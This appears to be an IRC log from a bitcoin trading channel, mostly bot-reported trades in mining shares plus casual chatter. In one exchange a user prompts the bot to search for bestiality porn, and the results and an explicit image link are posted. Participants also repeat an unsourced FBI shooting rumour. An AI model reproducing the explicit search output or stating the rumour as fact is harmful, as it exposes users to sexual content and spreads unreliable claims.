[BTCTC] [COGNITIVE] 1 @ 0.550001 BTC [-] Jul 14 14:35:55 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 14 14:37:53 [HAVELOCK] [AM100] 181 @ 0.039802 = 7.2042 BTC [+] Jul 14 14:38:02 [HAVELOCK] [AM100] 5 @ 0.03980101 = 0.199 BTC [-] Jul 14 14:38:10 [HAVELOCK] [AM100] 1 @ 0.03980101 BTC [-] Jul 14 14:38:18 [HAVELOCK] [AM100] 99 @ 0.03980101 = 3.9403 BTC [-] Jul 14 14:40:07 [HAVELOCK] [HIM] 22 @ 0.271 = 5.962 BTC [-] Jul 14 14:40:16 [HAVELOCK] [HIM] 1 @ 0.27 BTC [-] Jul 14 14:40:22 [HAVELOCK] [HIM] 2 @ 0.267 = 0.534 BTC [-] Jul 14 14:50:26 hi all from bali:) Jul 14 14:50:49 nice to see btc near 100, pretty shocked really Jul 14 14:51:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00413 BTC [+] Jul 14 14:53:59 [HAVELOCK] [HIM] 25 @ 0.27 = 6.75 BTC [+] Jul 14 14:54:19 can't really complain. Jul 14 14:54:25 [BTCTC] [DMS.SELLING] 10 @ 0.02569 = 0.2569 BTC [+] Jul 14 14:54:36 CHM, hows it going? Jul 14 14:54:49 not bad. other than the heat and the wet. Jul 14 14:54:50 i see best korea never visted you Jul 14 14:55:01 yeah heat and wet here too Jul 14 14:55:06 it's almost like it was never a real problem to begin with... Jul 14 14:55:18 i never thought it was Jul 14 14:55:24 media be trollin Jul 14 14:55:32 pretty much. Jul 14 14:55:52 only a crisis until something more interesting comes along. Jul 14 14:55:58 yup Jul 14 14:56:12 i forgot what story took over, but it was something like not big Jul 14 14:56:25 boston bombing I believe. big enough. Jul 14 14:56:28 [HAVELOCK] [HIM] 1 @ 0.267 BTC [-] Jul 14 14:56:33 closer to home more than anything. Jul 14 14:56:34 oh yeah Jul 14 14:56:40 that was pretty big Jul 14 14:56:59 did they report in the west about the fbi shooting that witness? Jul 14 14:57:21 dunno. dunno what you mean, so it must not have gotten this far. Jul 14 14:57:30 i keep reading about this guy the fbi was working with, and they shot him 7 times ones in the head. even had photos Jul 14 14:58:04 sounds petty "accidental". Jul 14 14:58:06 pretty Jul 14 14:58:22 like 5 fbi agents and one fried of the russian terrorists guys, then like right before he was to go to russia, the last meeting he gets killed and then the russians had some in the media about it but no one in the west that i saw Jul 14 14:58:49 no one cares. on to snowden. Jul 14 14:58:49 6 body shots, 1 head shot... yeah, i saw the photos and some repuatable for russian media had the story Jul 14 14:59:01 yeah Jul 14 14:59:20 lol at the usa grounding the ecudor guys plane and finding nothing Jul 14 14:59:53 that was one hell of a back fire and i bet the russians tricked the us into thinking he was on that plane, Jul 14 15:00:54 didn't see that. sounds pretty funny though. Jul 14 15:01:05 that was in the western media Jul 14 15:01:19 but not too much, cuz well, you know Jul 14 15:02:06 yep. Jul 14 15:05:31 [HAVELOCK] [HIM] 4 @ 0.26599001 = 1.064 BTC [-] Jul 14 15:06:24 [HAVELOCK] [HIM] 3 @ 0.262 = 0.786 BTC [-] Jul 14 15:06:41 [HAVELOCK] [HIM] 9 @ 0.261001 = 2.349 BTC [-] Jul 14 15:07:19 [HAVELOCK] [HIM] 8 @ 0.26 = 2.08 BTC [-] Jul 14 15:08:13 [HAVELOCK] [AM1] 3 @ 4.55 = 13.65 BTC [+] Jul 14 15:08:22 [BTCTC] [LTC-ATF.B2] 30 @ 0.010205 = 0.3062 BTC [+] Jul 14 15:09:35 AM1 ? Jul 14 15:09:49 [BTCTC] [LTC-ATF.B2] 46 @ 0.0102 = 0.4692 BTC [-] Jul 14 15:09:53 if AM why is it so much higher than the others? Jul 14 15:10:23 [BTCTC] [LTC-ATF.B2] 1 @ 0.0102 BTC [-] Jul 14 15:10:27 [HAVELOCK] [AM100] 126 @ 0.039802 = 5.0151 BTC [+] Jul 14 15:10:39 [HAVELOCK] [AM100] 101 @ 0.03980101 = 4.0199 BTC [-] Jul 14 15:11:05 [HAVELOCK] [AM1] 2 @ 4.55 = 9.1 BTC [+] Jul 14 15:12:39 [BTCTC] [COGNITIVE] 1 @ 0.578899 BTC [+] Jul 14 15:15:12 given the price of AM100, people selling AM100 to get AM1 Jul 14 15:15:42 wow, i dont even know what these are Jul 14 15:15:55 ASICM renamed Jul 14 15:16:11 massive spreads there Jul 14 15:18:05 [BTCTC] [BASIC-MINING] 1 @ 0.759997 BTC [-] Jul 14 15:20:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.0419 BTC [+] Jul 14 15:25:56 [BTCTC] [DMS.MINING] 39 @ 0.015979 = 0.6232 BTC [+] Jul 14 15:25:58 [BTCTC] [DMS.MINING] 65 @ 0.01598 = 1.0387 BTC [+] Jul 14 15:25:59 [BTCTC] [DMS.MINING] 86 @ 0.01598 = 1.3743 BTC [+] Jul 14 15:28:26 [BTCTC] [DMS.MINING] 64 @ 0.01598 = 1.0227 BTC [+] Jul 14 15:28:38 [BTCTC] [TAT.ASICMINER] 6 @ 0.041801 = 0.2508 BTC [-] Jul 14 15:31:38 [BTCTC] [DMS.MINING] 20 @ 0.015998 = 0.32 BTC [+] Jul 14 15:31:40 [BTCTC] [DMS.MINING] 50 @ 0.015999 = 0.8 BTC [+] Jul 14 15:31:41 [BTCTC] [DMS.MINING] 10 @ 0.016 = 0.16 BTC [+] Jul 14 15:31:42 [BTCTC] [DMS.MINING] 30 @ 0.016 = 0.48 BTC [+] Jul 14 15:33:09 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jul 14 15:34:34 [BTCTC] [DMS.MINING] 20 @ 0.016 = 0.32 BTC [+] Jul 14 15:49:42 [MPEX] [S.MPOE] 9200 @ 0.00094221 = 8.6683 BTC [-] Jul 14 15:52:18 [BTCTC] [AMC-PT] 110 @ 0.0025 = 0.275 BTC [+] Jul 14 15:52:37 [BTCTC] [TAT.ASICMINER] 13 @ 0.0418 = 0.5434 BTC [-] Jul 14 15:52:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.0417 = 0.1251 BTC [-] Jul 14 15:52:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.0416 = 0.416 BTC [-] Jul 14 15:52:43 [BTCTC] [TAT.ASICMINER] 18 @ 0.0413 = 0.7434 BTC [-] Jul 14 15:52:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.041142 BTC [-] Jul 14 15:52:46 [BTCTC] [TAT.ASICMINER] 41 @ 0.041141 = 1.6868 BTC [-] Jul 14 15:53:19 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [+] Jul 14 15:54:48 [BTCTC] [COGNITIVE] 10 @ 0.5789 = 5.789 BTC [+] Jul 14 15:56:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.041142 = 0.2469 BTC [+] Jul 14 15:57:06 [BTCTC] [ASICMINER-PT] 1 @ 4.219999 BTC [+] Jul 14 15:57:59 [BTCTC] [ASICMINER-PT] 3 @ 4.219999 = 12.66 BTC [+] Jul 14 15:58:01 [BTCTC] [ASICMINER-PT] 16 @ 4.22 = 67.52 BTC [+] Jul 14 15:59:06 [BTCTC] [TAT.ASICMINER] 29 @ 0.0418 = 1.2122 BTC [+] Jul 14 15:59:23 [BTCTC] [DMS.MINING] 6 @ 0.016296 = 0.0978 BTC [+] Jul 14 16:03:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.041999 BTC [+] Jul 14 16:03:37 [BTCTC] [ASICMINER-PT] 2 @ 4.22 = 8.44 BTC [+] Jul 14 16:04:03 ChaangNoi added to ignore list. Jul 14 16:04:18 Apocaly go ahead. Jul 14 16:05:05 [MPEX] [S.MPOE] 6400 @ 0.00094637 = 6.0568 BTC [+] Jul 14 16:05:12 [MPEX] [S.MPOE] 6141 @ 0.00095107 = 5.8405 BTC [+] Jul 14 16:05:28 [BTCTC] [TAT.VIRTUALMINE] 39 @ 0.00413 = 0.1611 BTC [+] Jul 14 16:07:16 [BTCTC] [ASICMINER-PT] 1 @ 4.22 BTC [+] Jul 14 16:08:49 [BTCTC] [COGNITIVE] 10 @ 0.5789 = 5.789 BTC [+] Jul 14 16:09:00 [BTCTC] [ASICMINER-PT] 1 @ 4.22 BTC [+] Jul 14 16:10:55 [HAVELOCK] [SDSTM] 4 @ 0.0098 = 0.0392 BTC [+] Jul 14 16:13:29 [BTCTC] [DMS.MINING] 14 @ 0.016296 = 0.2281 BTC [+] Jul 14 16:17:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.0418 = 0.209 BTC [-] Jul 14 16:22:57 [BTCTC] [DMS.PURCHASE] 8 @ 0.04035 = 0.3228 BTC [-] Jul 14 16:33:41 [BTCTC] [ASICMINER-PT] 8 @ 4.22 = 33.76 BTC [+] Jul 14 16:34:19 [BTCTC] [ASICMINER-PT] 10 @ 4.22 = 42.2 BTC [+] Jul 14 16:35:23 [BTCTC] [TAT.ASICMINER] 74 @ 0.0418 = 3.0932 BTC [-] Jul 14 16:36:17 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.004198 = 0.1259 BTC [+] Jul 14 16:36:19 [BTCTC] [TAT.VIRTUALMINE] 3600 @ 0.004199 = 15.1164 BTC [+] Jul 14 16:42:14 [BTCTC] [ASICMINER-PT] 1 @ 4.268 BTC [+] Jul 14 16:42:16 [BTCTC] [ASICMINER-PT] 2 @ 4.271999 = 8.544 BTC [+] Jul 14 16:42:17 [BTCTC] [ASICMINER-PT] 1 @ 4.272 BTC [+] Jul 14 16:42:19 [BTCTC] [ASICMINER-PT] 1 @ 4.273895 BTC [+] Jul 14 16:42:21 [BTCTC] [ASICMINER-PT] 1 @ 4.273897 BTC [+] Jul 14 16:42:22 [BTCTC] [ASICMINER-PT] 2 @ 4.274999 = 8.55 BTC [+] Jul 14 16:42:24 [BTCTC] [ASICMINER-PT] 1 @ 4.277999 BTC [+] Jul 14 16:42:25 [BTCTC] [ASICMINER-PT] 1 @ 4.278 BTC [+] Jul 14 16:42:27 [BTCTC] [ASICMINER-PT] 5 @ 4.278 = 21.39 BTC [+] Jul 14 16:42:28 [BTCTC] [ASICMINER-PT] 1 @ 4.289 BTC [+] Jul 14 16:42:30 [BTCTC] [ASICMINER-PT] 4 @ 4.289979 = 17.1599 BTC [+] Jul 14 16:42:31 [BTCTC] [ASICMINER-PT] 6 @ 4.29 = 25.74 BTC [+] Jul 14 16:42:33 [BTCTC] [ASICMINER-PT] 7 @ 4.29 = 30.03 BTC [+] Jul 14 16:49:06 [BTCTC] [ASICMINER-PT] 5 @ 4.22 = 21.1 BTC [-] Jul 14 16:56:26 [MPEX] [S.MPOE] 11187 @ 0.00095107 = 10.6396 BTC [+] Jul 14 16:57:24 [MPEX] [S.MPOE] 4513 @ 0.00095349 = 4.3031 BTC [+] Jul 14 17:02:10 [BTCTC] [COGNITIVE] 6 @ 0.57889 = 3.4733 BTC [-] Jul 14 17:04:17 [BTCTC] [DMS.MINING] 4 @ 0.016298 = 0.0652 BTC [+] Jul 14 17:07:48 [HAVELOCK] [AM100] 1 @ 0.040649 BTC [+] Jul 14 17:09:03 [BTCTC] [B.YABMC] 1 @ 0.0025 BTC [+] Jul 14 17:10:30 [BTCTC] [BASIC-MINING] 5 @ 0.72 = 3.6 BTC [-] Jul 14 17:13:18 [BTCTC] [DMS.PURCHASE] 36 @ 0.04035 = 1.4526 BTC [-] Jul 14 17:14:01 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jul 14 17:15:00 [HAVELOCK] [SDSTM] 1 @ 0.0094 BTC [-] Jul 14 17:15:02 [HAVELOCK] [SDSTM] 11 @ 0.0082 = 0.0902 BTC [-] Jul 14 17:15:03 [HAVELOCK] [SDSTM] 15 @ 0.00800001 = 0.12 BTC [-] Jul 14 17:15:04 [HAVELOCK] [SDSTM] 370 @ 0.008 = 2.96 BTC [-] Jul 14 17:15:05 [HAVELOCK] [SDSTM] 100 @ 0.008 = 0.8 BTC [-] Jul 14 17:15:07 [HAVELOCK] [SDSTM] 200 @ 0.008 = 1.6 BTC [-] Jul 14 17:18:29 that SDSTM IPO is hilarious Jul 14 17:18:41 currently still 800% overpriced wow Jul 14 17:21:03 [BTCTC] [DMS.MINING] 11 @ 0.016298 = 0.1793 BTC [+] Jul 14 17:21:14 yep Jul 14 17:21:15 [MPEX] [S.MG] 10000 @ 0.00017 = 1.7 BTC [-] Jul 14 17:21:17 [MPEX] [S.MG] 4999 @ 0.0001708 = 0.8538 BTC [+] Jul 14 17:21:20 people ar estrange Jul 14 17:21:32 [MPEX] [S.MG] 20159 @ 0.00017095 = 3.4462 BTC [+] Jul 14 17:21:34 [MPEX] [S.MG] 10000 @ 0.000171 = 1.71 BTC [+] Jul 14 17:21:52 [MPEX] [S.MPOE] 1677 @ 0.00094559 = 1.5858 BTC [-] Jul 14 17:23:43 [MPEX] [S.MG] 10000 @ 0.000175 = 1.75 BTC [+] Jul 14 17:23:45 [MPEX] [S.MG] 10000 @ 0.00018 = 1.8 BTC [+] Jul 14 17:23:53 [MPEX] [S.MG] 10000 @ 0.000185 = 1.85 BTC [+] Jul 14 17:23:57 [MPEX] [S.MG] 5000 @ 0.00019 = 0.95 BTC [+] Jul 14 17:25:15 [BTCTC] [AMC-PT] 809 @ 0.0025 = 2.0225 BTC [+] Jul 14 17:27:02 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 14 17:27:51 [MPEX] [S.MG] 274 @ 0.00019 = 0.0521 BTC [+] Jul 14 17:33:15 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [+] Jul 14 17:36:56 indeed Jul 14 17:37:14 [HAVELOCK] [AM100] 25 @ 0.04 = 1 BTC [-] Jul 14 17:45:13 [BTCTC] [TAT.ASICMINER] 45 @ 0.0415 = 1.8675 BTC [-] Jul 14 17:45:18 [HAVELOCK] [AM100] 1 @ 0.04055 BTC [+] Jul 14 17:45:19 [HAVELOCK] [AM100] 35 @ 0.040653 = 1.4229 BTC [+] Jul 14 17:45:21 [HAVELOCK] [AM100] 9 @ 0.04065399 = 0.3659 BTC [+] Jul 14 17:46:40 [BTCTC] [COGNITIVE] 1 @ 0.5757 BTC [-] Jul 14 17:47:12 [BTCTC] [COGNITIVE] 26 @ 0.5789 = 15.0514 BTC [+] Jul 14 17:48:27 [BTCTC] [ASICMINER-PT] 3 @ 4.249 = 12.747 BTC [-] Jul 14 17:48:29 [BTCTC] [ASICMINER-PT] 6 @ 4.25 = 25.5 BTC [+] Jul 14 17:49:28 [BTCTC] [COGNITIVE] 1 @ 0.5789 BTC [+] Jul 14 17:51:04 [BTCTC] [COGNITIVE] 20 @ 0.5789 = 11.578 BTC [+] Jul 14 17:51:08 [BTCTC] [ASICMINER-PT] 1 @ 4.23 BTC [-] Jul 14 17:53:12 [BTCTC] [COGNITIVE] 4 @ 0.5789 = 2.3156 BTC [+] Jul 14 17:58:29 [BTCTC] [COGNITIVE] 5 @ 0.5789 = 2.8945 BTC [+] Jul 14 18:01:42 ;;bids 0 Jul 14 18:01:43 There are currently 21979648 bitcoins demanded at or over 0.0 USD, worth 11986670.1826 USD in total. | Data vintage: 0.0076 seconds Jul 14 18:06:01 ;;bids 0 Jul 14 18:06:15 There are currently 21979767 bitcoins demanded at or over 0.0 USD, worth 11997928.8059 USD in total. | Data vintage: 0.0078 seconds Jul 14 18:09:51 [BTCTC] [AMC-PT] 158 @ 0.002499 = 0.3948 BTC [-] Jul 14 18:10:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.042 BTC [+] Jul 14 18:12:22 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 14 18:12:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.042499 = 0.1275 BTC [+] Jul 14 18:12:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.042499 = 0.1275 BTC [+] Jul 14 18:13:44 [BTCTC] [GSDPT] 881 @ 0.002 = 1.762 BTC [-] Jul 14 18:13:47 [HAVELOCK] [AM100] 25 @ 0.040653 = 1.0163 BTC [-] Jul 14 18:14:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.042499 = 0.17 BTC [+] Jul 14 18:16:11 [BTCTC] [BASIC-MINING] 3 @ 0.685051 = 2.0552 BTC [-] Jul 14 18:17:02 [BTCTC] [ASICMINER-PT] 13 @ 4.25 = 55.25 BTC [+] Jul 14 18:17:47 [BTCTC] [BASIC-MINING] 5 @ 0.68505 = 3.4253 BTC [-] Jul 14 18:17:49 [BTCTC] [BASIC-MINING] 1 @ 0.685 BTC [-] Jul 14 18:17:51 [BTCTC] [BASIC-MINING] 10 @ 0.680001 = 6.8 BTC [-] Jul 14 18:17:52 [BTCTC] [BASIC-MINING] 5 @ 0.68 = 3.4 BTC [-] Jul 14 18:17:54 [BTCTC] [BASIC-MINING] 8 @ 0.68 = 5.44 BTC [-] Jul 14 18:21:09 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 14 18:25:47 [HAVELOCK] [AM100] 5 @ 0.040653 = 0.2033 BTC [-] Jul 14 18:25:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.0416 = 0.1664 BTC [-] Jul 14 18:26:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.0415 BTC [-] Jul 14 18:26:02 [BTCTC] [TAT.ASICMINER] 22 @ 0.041161 = 0.9055 BTC [-] Jul 14 18:26:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.04116 = 0.1646 BTC [-] Jul 14 18:26:06 [BTCTC] [TAT.ASICMINER] 12 @ 0.04115 = 0.4938 BTC [-] Jul 14 18:27:27 [BTCTC] [COGNITIVE] 15 @ 0.5789 = 8.6835 BTC [+] Jul 14 18:27:29 [BTCTC] [COGNITIVE] 23 @ 0.57899 = 13.3168 BTC [+] Jul 14 18:29:14 [BTCTC] [AMC-PT] 8150 @ 0.0025 = 20.375 BTC [+] Jul 14 18:29:30 [HAVELOCK] [AM100] 1 @ 0.0402 BTC [-] Jul 14 18:30:45 [HAVELOCK] [AM100] 1 @ 0.04065399 BTC [+] Jul 14 18:32:11 [HAVELOCK] [AM100] 40 @ 0.04065399 = 1.6262 BTC [+] Jul 14 18:33:24 [HAVELOCK] [AM100] 100 @ 0.040666 = 4.0666 BTC [+] Jul 14 18:34:01 [HAVELOCK] [AM100] 10 @ 0.040789 = 0.4079 BTC [+] Jul 14 18:34:18 [BTCTC] [ASICMINER-PT] 1 @ 4.238503 BTC [-] Jul 14 18:37:57 [BTCTC] [AMC-PT] 1687 @ 0.0025 = 4.2175 BTC [+] Jul 14 18:40:37 [BTCTC] [ASICMINER-PT] 1 @ 4.238503 BTC [-] Jul 14 18:40:47 [BTCTC] [ASICMINER-PT] 1 @ 4.238502 BTC [-] Jul 14 18:40:49 [BTCTC] [ASICMINER-PT] 1 @ 4.2385 BTC [-] Jul 14 18:40:51 [BTCTC] [ASICMINER-PT] 1 @ 4.235001 BTC [-] Jul 14 18:43:58 [MPEX] [S.MPOE] 6400 @ 0.00093482 = 5.9828 BTC [-] Jul 14 18:46:24 [BTCTC] [ASICMINER-PT] 3 @ 4.235 = 12.705 BTC [-] Jul 14 18:46:59 [BTCTC] [S.DICE-PT] 4 @ 0.002297 = 0.0092 BTC [-] Jul 14 18:47:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.041996 = 0.21 BTC [+] Jul 14 18:47:38 [BTCTC] [TAT.ASICMINER] 79 @ 0.041997 = 3.3178 BTC [+] Jul 14 18:47:40 [BTCTC] [TAT.ASICMINER] 153 @ 0.042 = 6.426 BTC [+] Jul 14 18:47:42 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 14 18:48:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.042 = 0.126 BTC [+] Jul 14 18:48:28 [BTCTC] [TAT.ASICMINER] 50 @ 0.041551 = 2.0776 BTC [-] Jul 14 18:48:30 [BTCTC] [TAT.ASICMINER] 100 @ 0.04155 = 4.155 BTC [-] Jul 14 18:48:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0415 BTC [-] Jul 14 18:48:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0412 BTC [-] Jul 14 18:48:36 [BTCTC] [TAT.ASICMINER] 29 @ 0.04115 = 1.1934 BTC [-] Jul 14 18:48:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.041141 = 0.1234 BTC [-] Jul 14 18:48:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.041141 = 0.0823 BTC [-] Jul 14 18:48:43 [BTCTC] [TAT.ASICMINER] 70 @ 0.04114 = 2.8798 BTC [-] Jul 14 18:51:26 [BTCTC] [AMC-PT] 9300 @ 0.0025 = 23.25 BTC [+] Jul 14 18:51:36 [BTCTC] [BITVPS] 5 @ 0.001973 = 0.0099 BTC [-] Jul 14 18:51:38 [BTCTC] [BITVPS] 3 @ 0.0018 = 0.0054 BTC [-] Jul 14 18:51:39 [BTCTC] [BITVPS] 27 @ 0.001747 = 0.0472 BTC [-] Jul 14 18:51:52 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 14 18:52:30 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 14 18:53:17 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 14 18:55:04 [BTCTC] [B.YABMC] 1 @ 0.002455 BTC [-] Jul 14 18:55:06 [BTCTC] [B.YABMC] 1 @ 0.002217 BTC [-] Jul 14 18:55:17 [BTCTC] [B.YABMC] 8 @ 0.002216 = 0.0177 BTC [-] Jul 14 18:57:22 [BTCTC] [ASICMINER-PT] 1 @ 4.235001 BTC [+] Jul 14 18:58:00 [MPEX] [S.MPOE] 9000 @ 0.00093035 = 8.3732 BTC [-] Jul 14 18:58:02 [MPEX] [S.MPOE] 5350 @ 0.00092895 = 4.9699 BTC [-] Jul 14 18:58:05 [MPEX] [S.MPOE] 5775 @ 0.00092846 = 5.3619 BTC [-] Jul 14 18:58:13 [BTCTC] [ASICMINER-PT] 4 @ 4.235 = 16.94 BTC [-] Jul 14 18:58:54 [HAVELOCK] [SDSTM] 11 @ 0.0088 = 0.0968 BTC [+] Jul 14 19:00:49 [BTCTC] [BASIC-MINING] 2 @ 0.68 = 1.36 BTC [-] Jul 14 19:01:25 [HAVELOCK] [SDSTM] 1 @ 0.0089 BTC [+] Jul 14 19:02:33 [BTCTC] [BASIC-MINING] 1 @ 0.67001 BTC [-] Jul 14 19:04:02 "Joao Maria de Souza, 45, had been in bed with his wife Leni when the animal fell through the ceiling of their home in Caratinga, southeast Brazil." Jul 14 19:04:05 cows fall, everyone dies. Jul 14 19:05:52 Hillside Real Estate has some splaining to do Jul 14 19:06:49 I've begun my adventure into the backlog of Trilema Jul 14 19:07:25 too bad so much of it isn't in English :( Jul 14 19:09:25 maybe i have it translated some day Jul 14 19:09:36 insanely fucking hard to translate tho, because i write very tense. Jul 14 19:09:44 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.0042 = 1.05 BTC [+] Jul 14 19:10:03 google translate sorta helps if I'm just skimming Jul 14 19:10:15 it certainly helps the humor Jul 14 19:10:49 Do you recall what your first bitcoin post was? Jul 14 19:11:01 actually in the latest post there's links to commentary Jul 14 19:11:08 ppl were like hey, what about btc!!! all through 2011 Jul 14 19:11:12 till i finally got it Jul 14 19:12:26 http://www.dailymail.co.uk/news/article-2362522/Man-killed-1-5tonne-cow-crashes-corrugated-iron-roof-slept.html Jul 14 19:12:31 Man killed by a 1.5tonne cow after it crashes through his corrugated iron roof as he slept | Mail O Jul 14 19:12:39 "His wife, and the cow, both reportedly escaped unharmed." Jul 14 19:12:54 lol Jul 14 19:12:56 this is epic Jul 14 19:13:03 I wonder where they ran off to Jul 14 19:13:14 and if it was the plan all along Jul 14 19:13:21 lol Jul 14 19:13:30 hehe Jul 14 19:13:48 ;;google "woman fucks cow" Jul 14 19:13:49 Woman and......cow?!?! Fuckin hell... - NewsFilter: ; Man Fuck Cow Animal Sex Videos - Free Porn Videos - Heavy-R.com: ; Reverse Cowgirl, Reverse Cow Girl Porn Videos - FuQ.com: Jul 14 19:13:54 fuck me. Jul 14 19:13:59 i thought i got a rule 34 exception Jul 14 19:14:08 'And now he's lying in his bed and gets crushed to death by a cow. There's no justice in the world.' Jul 14 19:14:16 lol Jul 14 19:14:20 but there it is Jul 14 19:14:28 http://cds.u2u9p3e8.hwcdn.net/prev/video/59453/59453-10-710x400-41b23b1a.jpg Jul 14 19:14:58 "He added police officers were also trying to identify the owner of the cow, who could be charged with involuntary manslaughter." Jul 14 19:18:17 [BTCTC] [COGNITIVE] 37 @ 0.57899 = 21.4226 BTC [+] Jul 14 19:18:20 [BTCTC] [COGNITIVE] 7 @ 0.58 = 4.06 BTC [+] Jul 14 19:19:02 it's not ever going to fly. Jul 14 19:19:51 grats on cutting the cord for your "IRL" business Jul 14 19:20:07 I'm pretty far along doing the same Jul 14 19:20:56 my email signature has progressed from "new projects will be booked 1-2 weeks out" to 2-4 weeks, to No New Clients/Projects Jul 14 19:21:07 soon it'll be "Fuck off." Jul 14 19:21:28 well, not really, but yknow Jul 14 19:22:53 [BTCTC] [BTC-TRADING-PT] 2 @ 0.99 = 1.98 BTC [+] Jul 14 19:24:17 [BTCTC] [B.YABMC] 1 @ 0.0025 BTC [+] Jul 14 19:24:50 How is Usagi a VIP on the forum? Jul 14 19:24:56 what does it even mean? Jul 14 19:25:17 [MPEX] [S.MPOE] 3397 @ 0.00092846 = 3.154 BTC [-] Jul 14 19:25:38 [BTCTC] [COGNITIVE] 1 @ 0.58 BTC [+] Jul 14 19:26:01 [BTCTC] [COGNITIVE] 4 @ 0.58 = 2.32 BTC [+] Jul 14 19:27:27 [BTCTC] [BASIC-MINING] 1 @ 0.67001 BTC [-] Jul 14 19:28:44 [HAVELOCK] [SDSTM] 100 @ 0.0089 = 0.89 BTC [+] Jul 14 19:28:53 [BTCTC] [LTC-MINING] 1 @ 0.39 BTC [+] Jul 14 19:29:02 haha "Happy French Socialism Day" :( Jul 14 19:29:53 [BTCTC] [TAT.VIRTUALMINE] 75 @ 0.0042 = 0.315 BTC [+] Jul 14 19:34:42 [HAVELOCK] [AM1] 1 @ 4.349 BTC [-] Jul 14 19:36:58 [BTCTC] [DMS.MINING] 1 @ 0.01625 BTC [-] Jul 14 19:37:36 [BTCTC] [TAT.ASICMINER] 200 @ 0.041998 = 8.3996 BTC [+] Jul 14 19:38:12 [BTCTC] [DMS.MINING] 7 @ 0.01625 = 0.1138 BTC [-] Jul 14 19:39:42 ThickAsThieves myeah. Jul 14 19:39:54 it is what it is. Jul 14 19:41:32 lol this is pretty lulzy. dev guy : "i'll be in and out for a lil". quest writer etc, dev guy's gf : "no you're not." Jul 14 19:42:38 [HAVELOCK] [AM100] 10 @ 0.040389 = 0.4039 BTC [-] Jul 14 19:46:07 [HAVELOCK] [AM100] 10 @ 0.040389 = 0.4039 BTC [-] Jul 14 19:46:22 You'd love to see some of the requests Coinroll gets. Pretty lulzy too. Jul 14 19:47:03 [HAVELOCK] [AM100] 80 @ 0.040389 = 3.2311 BTC [-] Jul 14 19:47:04 [HAVELOCK] [AM100] 1 @ 0.04056 BTC [+] Jul 14 19:47:06 [HAVELOCK] [AM100] 9 @ 0.040789 = 0.3671 BTC [+] Jul 14 19:47:07 [HAVELOCK] [AM100] 3 @ 0.04079 = 0.1224 BTC [+] Jul 14 19:47:08 [HAVELOCK] [AM100] 15 @ 0.040956 = 0.6143 BTC [+] Jul 14 19:47:08 [HAVELOCK] [AM100] 25 @ 0.0409682 = 1.0242 BTC [+] Jul 14 19:47:09 [HAVELOCK] [AM100] 10 @ 0.0409682 = 0.4097 BTC [+] Jul 14 19:47:10 [HAVELOCK] [AM100] 17 @ 0.041 = 0.697 BTC [+] Jul 14 19:47:12 [HAVELOCK] [AM100] 35 @ 0.040001 = 1.4 BTC [-] Jul 14 19:47:14 [HAVELOCK] [AM100] 3 @ 0.040999 = 0.123 BTC [+] Jul 14 19:47:31 don't get me started on that Jul 14 19:47:40 plz do Jul 14 19:48:19 The stuff people come up with to get refunded their loss. Jul 14 19:48:31 Even if they won big and lost a part of it. Jul 14 19:48:57 it ranges from "my enter key got stuck" to "hacker took control of my computer and kept betting" Jul 14 19:49:01 im not making this shit up Jul 14 19:50:07 i am completely unsurprised. Jul 14 19:50:22 maybe TradeFortress can sell sticky key insurance Jul 14 19:50:30 kakobreklaa gets a lot of fanmail along the lines of "i should be refunded this bet because it lost and it didn't clearly specify i might not win" Jul 14 19:52:29 To add to your quote, "I thought this was welfare with lights and colors and shit" Jul 14 19:53:01 "you're all running this because if i live off of it i might make a post on bitcointalk about how you're kinda cool but not as cool as me/mycat/this guy i know" Jul 14 19:53:12 mircea_popescu: your pr rep is maaad at me lol Jul 14 19:53:24 what did you do ? Jul 14 19:53:37 made assumptions about S.MG Jul 14 19:53:37 schooled her on game design? Jul 14 19:53:44 PUBLIC ASSUMPTIONS Jul 14 19:53:55 that's surprisinfg Jul 14 19:54:26 i guess this is why they have miyamoto do the E3 talks and not a pr rep Jul 14 19:54:37 [10:27] <@assbot> [MPEX] [S.MG] 274 @ 0.00019 = 0.0521 BTC [+] Jul 14 19:54:57 ok well, on the positive side nano is getting me the -foyer log of july 22 Jul 14 19:55:10 which will forever live in memory as the black day mp joined btc. Jul 14 19:55:18 so you'll get to check out noob me presently. Jul 14 19:56:29 I assume you were telling everyone how idiotic they are out the gates Jul 14 19:57:20 [BTCTC] [BASIC-MINING] 10 @ 0.5 = 5 BTC [-] Jul 14 19:58:04 now now, let's not spolier. Jul 14 19:59:08 Why would I not be surprised. Jul 14 19:59:10 [BTCTC] 